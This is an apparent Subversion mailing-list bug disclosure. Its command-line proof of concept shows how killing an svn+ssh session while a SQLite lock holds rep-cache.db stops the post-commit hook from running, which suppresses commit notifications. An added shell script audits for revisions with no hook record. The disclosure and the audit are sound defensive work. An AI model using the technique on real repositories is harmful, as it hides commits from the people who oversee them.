When using svn+ssh://, if the ssh session is killed whilst rep-cache.db
is being written to, then the post-commit hook won't run.

The problem is that a malicious committer could intentionally kill the
ssh session at that point in time, to prevent post-commit emails from
being sent, and so on.

Proof of concept:

% rm -rf r
% svnadmin create r
% printf '%s\n' '#!/bin/sh' 'touch /tmp/good' > r/hooks/post-commit
% chmod +x r/hooks/post-commit
% rm -f /tmp/good
%
% svnmucc put -mm r/README.txt file://$PWD/r/$RANDOM # creates rep-cache.db
% rm /tmp/good
%
% sqlite3 r/db/rep-cache.db
sqlite> begin immediate transaction;
sqlite> ^Z
zsh: suspended sqlite3 r/db/rep-cache.db
% svnmucc put -mm =(date; echo $RANDOM) svn+ssh://localhost/$PWD/r/$RANDOM
daniel@localhost's password:
^Z
zsh: suspended svnmucc put -mm =(date; echo $RANDOM) svn+ssh://localhost/$PWD/r/$RANDOM
% pkill -x ssh
% rm /tmp/good
rm: cannot remove ‘/tmp/good’: No such file or directory
zsh: exit 1 rm /tmp/good
Received on 2016-10-22 14:20:22 CEST
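
An added example, not part of the original message or of Subversion: a server-side audit that lists revisions for which the post-commit hook never left a record. It assumes the skipped-hook revision is still present in the repository, and that the post-commit hook appends its REV argument to a log file; the log path and the function names are hypothetical.

```shell
#!/bin/sh
# Audit for revisions whose post-commit hook never ran.
#
# Assumption (not from the original message): the post-commit hook records
# each revision it handles, one per line, e.g. with
#     echo "$2" >> "$1/hooks/post-commit.ran"
# ($1 = repository path, $2 = revision, as passed to post-commit).

# missing_hook_revs YOUNGEST LOGFILE [FIRST]
# Print every revision in FIRST..YOUNGEST that has no line in LOGFILE.
# A missing or unreadable LOGFILE means every revision is reported.
missing_hook_revs() {
    youngest=$1 log=$2 first=${3:-1}
    rev=$first
    while [ "$rev" -le "$youngest" ]; do
        grep -qx "$rev" "$log" 2>/dev/null || echo "$rev"
        rev=$((rev + 1))
    done
}

# audit_repo REPOS LOGFILE
# Returns 0 if every revision was recorded, 1 if some were not,
# 2 if the repository could not be read. Run it from cron, outside the
# commit path, so a killed ssh session cannot interrupt it. The newest
# revision may be flagged while its hook is still running; re-check it
# after a grace period before alerting.
audit_repo() {
    youngest=$(svnlook youngest "$1") || return 2
    missing=$(missing_hook_revs "$youngest" "$2")
    [ -z "$missing" ] && return 0
    echo "post-commit not recorded for revisions:" $missing >&2
    return 1
}

# Constructed sample: a repository at r5 whose hook log lacks r3 and r5.
demo() {
    log=$(mktemp) && printf '%s\n' 1 2 4 > "$log"
    missing_hook_revs 5 "$log"
    rm -f "$log"
}
```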